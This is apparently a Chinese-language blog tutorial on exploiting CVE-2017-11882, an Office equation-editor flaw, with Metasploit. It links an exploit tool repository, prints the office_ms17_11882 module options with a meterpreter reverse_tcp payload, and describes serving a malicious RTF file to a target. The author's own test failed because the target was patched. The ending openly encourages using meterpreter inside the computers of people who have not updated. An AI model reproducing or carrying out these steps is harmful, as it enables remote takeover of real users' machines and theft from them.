這個漏洞出來很久了,據說通殺以下版本的Office:
MicrosoftOffice 2000
MicrosoftOffice 2003
MicrosoftOffice 2007 Service Pack 3
MicrosoftOffice 2010 Service Pack 2
MicrosoftOffice 2013 Service Pack 1
MicrosoftOffice 2016
MicrosoftOffice 365
注意是沒有更新過的Office。
屁話不多說了。因爲我比較喜歡使用Metasploit框架,大家不喜歡的話可以到這個地址:https://github.com/Ridter/CVE-2017-11882.git下載工具。
首先,啓動Metasploit並連接數據庫(沒有自動連接的請手動操作)。
然後加載這個模塊,如圖:
使用show options看看有什麼要設置的。
msf exploit(windows/fileformat/office_ms17_11882) > show options
Module options (exploit/windows/fileformat/office_ms17_11882):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes Filename to save as, or inject
FOLDER_PATH no Path to file to inject
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office
msf exploit(windows/fileformat/office_ms17_11882) >
其中,Required選項爲Yes的必須要填。有一些設置是默認的。然後開始設置,並啓動服務。
接着,我們在物理機上訪問一下這個地址。
注意,我們啓用了SSL,因此Chrome會彈出不安全提示。
只需要點高級,繼續訪問即可。
如圖,就會下載這個文件。
如果Office沒有打補丁,你就會發現返回了一個meterpreter回話,但是不幸的是,Win10給我自動更新裝上了這個補丁,於是我看到的是這樣的。
這也就意味着滲透失敗了。但是如果對方是一個將Windows自動更新關閉且沒有在安全軟件的監護下安裝漏洞補丁的人,你就可以使用meterpreter愉快的在他的電腦裏玩耍了。